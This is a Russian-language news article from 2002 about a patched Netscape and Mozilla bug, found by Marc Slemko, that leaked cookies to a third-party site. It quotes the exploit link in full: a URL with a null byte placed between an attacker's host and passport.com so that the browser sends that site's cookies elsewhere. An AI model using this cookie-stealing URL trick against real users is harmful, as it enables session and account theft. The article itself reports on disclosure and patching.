Netscape и Mozilla отдают cookies на сторону

Author:

Алексей Рерих

В браузере Netscape Communicator обнаружена дыра, позволяющая злоумышленнику получить доступ к пользовательским cookies.

Уязвимое место, обнаруженное в Netscape, начиная с версии 6.0 и выше, аналогично дыре в браузере Mozilla версии 0.9.6 и более ранних, на движке которого создан последний Netscape.

И Netscape и Mozilla уже выпустили обновленные версии браузеров (Netscape 6.2.1 и Mozilla 0.9.7), в которых уязвимость устранена.

Сообщение об обнаружении уязвимого места помещено на сайте ZNep.com. Марк Слемко пишет в своем отчете, что для получения доступа к чужим cookies достаточно разместить на веб-странице или в электронном html-сообщении гиперссылку определенного вида. В результате оба браузера отсылают по указанному адресу cookies, предназначенные для совсем другого (любого другого) сайта.

В нормальной ситуации информация, сохраняемая в cookies, может быть прочитана только тем сервером, который ее записывал (или теми, в которых сервер кооперирован, то есть, находится в одном домене). Параметры браузера можно выставить таким образом, что cookies будет “отдаваться” только через безопасное SSL-соединение.

Однако обнаруженный Марком Слемко баг позволяет любому получать чужие cookies в обход всех этих защитный механизмов.

Баг был онаружен еще 15 ноября прошлого года. Тогда же Слемко отослал сообщение об обнаруженной дыре в Netscape и, после долгих поисков почтового адреса, разработчикам браузера Mozilla.

И только после того, как необходимые патчи и апгрейды были разработаны, Марк Слемко опубликовал информацию о дыре.

Собственно, сама дыра, по выражению самого Слемко, тривиальна: достаточно разместить на странице или в e-mail ссылку вида: http://alive.znep.com%00www.passport.com/cgi-bin/cookies. В результате клика по ссылке дырявые браузеры отошлют на сервер, адрес которого указан до %00, cookies предназначенные для сервера, адрес которого расположен после %00.

Несмотря на тривиальность исполнения, это нарушение безопасного соединения может привести к самым различным последствиям. Все зависит от того, какая информация о пользователе хранится на севере, доступ к cookies которого получен злоумышленником.

Аналогичные баги были не так давно обнаружены и в Microsoft Internet Explorer.

Скачать обновленную, залатанную версию барузеров можно на сайтах Netscape.com (здесь) и Mozilla.org.

ССЫЛКИ ПО ТЕМЕ


Nepscape

Mozilla

Mozilla Cookie Exploit – Отчет Марка Слемко, 22.01.02

МАТЕРИАЛЫ ПО ТЕМЕ


В Media Player спрятан шпион посильнее обычных cookies16.01.02


Дыра в IE позволяет подделать сертификат безопасности28.12.01


Европарламент одобрил запрещение cookies14.11.01


Новая дыра от Microsoft: ваши cookies может читать кто угодно12.11.01


Вячеслав Ансимов
“Рамблер” и SpyLOG готовы к IE 6, обрезающему cookies28.08.01


Netscape 6.1 beta: жизнь после смерти14.06.01


Вячеслав Ансимов
Netscape 6 – что это?17.11.00